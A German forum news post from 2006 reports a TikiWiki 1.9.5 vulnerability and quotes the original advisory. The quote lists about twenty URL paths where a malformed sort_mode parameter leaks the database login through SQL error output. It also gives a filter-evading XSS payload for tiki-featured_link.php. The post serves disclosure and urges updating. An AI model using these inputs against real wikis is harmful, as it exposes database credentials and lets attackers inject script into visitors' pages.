Portal > Foren > Ankündigungen, News und Feedback > Nachrichten > TikiWiki mit signifikanter Sicherheitslücke
Antwort
 
Themen-Optionen Thema durchsuchen
Alt 02.11.2006, 16:21 Nach oben    #1
Ben
Benjamin Klaile
 
Benutzerbild von Ben
 
Registriert seit: 02.12.2004
Ort: Remagen
Beiträge: 4.516
Standard TikiWiki mit signifikanter Sicherheitslücke

Die Wiki-Anwendung TikiWiki besitzt in der Version 1.9.5 laut Heise.de eine signifikante Sicherheitslücke, durch die man auf die Datenbank der Installation zugreifen kann.

Zitat:
Da die Wiki-Software SQL-Fehlermeldungen in den HTML-Seiten ausgibt, genügt der Fehlermeldung von securfrog zufolge das Provozieren eines solchen SQL-Fehlers mit der Variable sort_mode. Dabei könnten die Zugangsdaten des Wikis für die Datenbank ausgegeben werden.
Weiterhin besteht eine XSS-Schwachstelle in der Datei tiki-featured_link.php, über die Angreifer beliebigen Code einschleusen können.

Laut Heise soll die sort_mode-Lücke (siehe Originalartikel) in der CVS-Version von TikiWiki geschlossen worden sein. Ein Update ist somit sicherlich anzuraten, wobei natürlich auf eventuell anderweitig auftretende Probleme zu achten ist.


Originaltext der Meldung des Sicherheitslecks:
http://archives.neohapsis.com/archiv...6-11/0014.html

Zitat:
/*==========================================*/
//tikiwiki version 1.9.5 (CVS) -Sirius- (PoC)
// Product: Tikiwiki
// URL: http://tikiwiki.org/
// RISK: critical
/*==========================================*/

there's a critical security bug in tikiwiki version 1.9.5 (CVS) -Sirius-
a anonymous user , can dump the mysql user & passwd just by creating a mysql error with the "sort_mode" var , with those following links :
/tiki-listpages.php?offset=0&sort_mode=
/tiki-lastchanges.php?days=1&offset=0&sort_mode=
/messu-archive.php?sort_mode=
/messu-mailbox.php?sort_mode=
/messu-sent.php?sort_mode=
/tiki-directory_add_site.php?sort_mode=
/tiki-directory_ranking.php?sort_mode=
/tiki-directory_search.php?sort_mode=
/tiki-forums.php?sort_mode=
/tiki-view_forum.php?forumId=
/tiki-friends.php?sort_mode=
/tiki-list_blogs.php?sort_mode=
/tiki-list_faqs.php?sort_mode=
/tiki-list_trackers.php?sort_mode=
/tiki-list_users.php?sort_mode=
/tiki-my_tiki.php?sort_mode=
/tiki-notepad_list.php?sort_mode=
/tiki-orphan_pages.php?sort_mode=
/tiki-shoutbox.php?sort_mode=
/tiki-usermenu.php?sort_mode=
/tiki-webmail_contacts.php?sort_mode=

a proof of concept is disponible here : http://cockor.free.fr/PoC.swf

there's also a xss here :
/tiki-featured_link.php?type=f&url=" ></iframe><scr</script>ipt>alert('XSS')</scri</script>pt> <!--

regards , securfrog
Die Demo zeigt das ganze Übel recht anschaulich.
Ben ist offline  
Diesen Beitrag zu to del.icio.us hinzufügen!Diesen Beitrag zu Technorati hinzufügen!Diesen Beitrag zu Mister Wong hinzufügen!
Mit Zitat antworten
Antwort

Lesezeichen


Aktive Benutzer in diesem Thema: 1 (Registrierte Benutzer: 0, Gäste: 1)
 
Themen-Optionen Thema durchsuchen
Thema durchsuchen:

Erweiterte Suche

Forumregeln
Es ist dir nicht erlaubt, neue Themen zu verfassen.
Es ist dir nicht erlaubt, auf Beiträge zu antworten.
Es ist dir nicht erlaubt, Anhänge hochzuladen.
Es ist dir nicht erlaubt, deine Beiträge zu bearbeiten.

BB-Code ist an.
Smileys sind an.
[IMG] Code ist an.
HTML-Code ist aus.
Trackbacks sind an
PingBacks sind an
RefBacks sind aus

Ähnliche Themen
Thema Autor Forum Antworten Letzter Beitrag
MediaWiki 1.5.3 schließt kritische Sicherheitslücke Jann Hendrik Nachrichten 0 06.12.2005 08:24
Sicherheitslücke in Mambo (<=) 4.5.2.3 Ben Nachrichten 1 18.11.2005 00:01
Lynx Browser mit Sicherheitslücke Ben Nachrichten 0 14.11.2005 16:33


Alle Zeitangaben in WEZ +1. Es ist jetzt 22:48 Uhr.


Powered by vBulletin® Version 3.7.4 (Deutsch)
Copyright ©2000 - 2008, Jelsoft Enterprises Ltd.
Search Engine Optimization by vBSEO 3.2.0

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45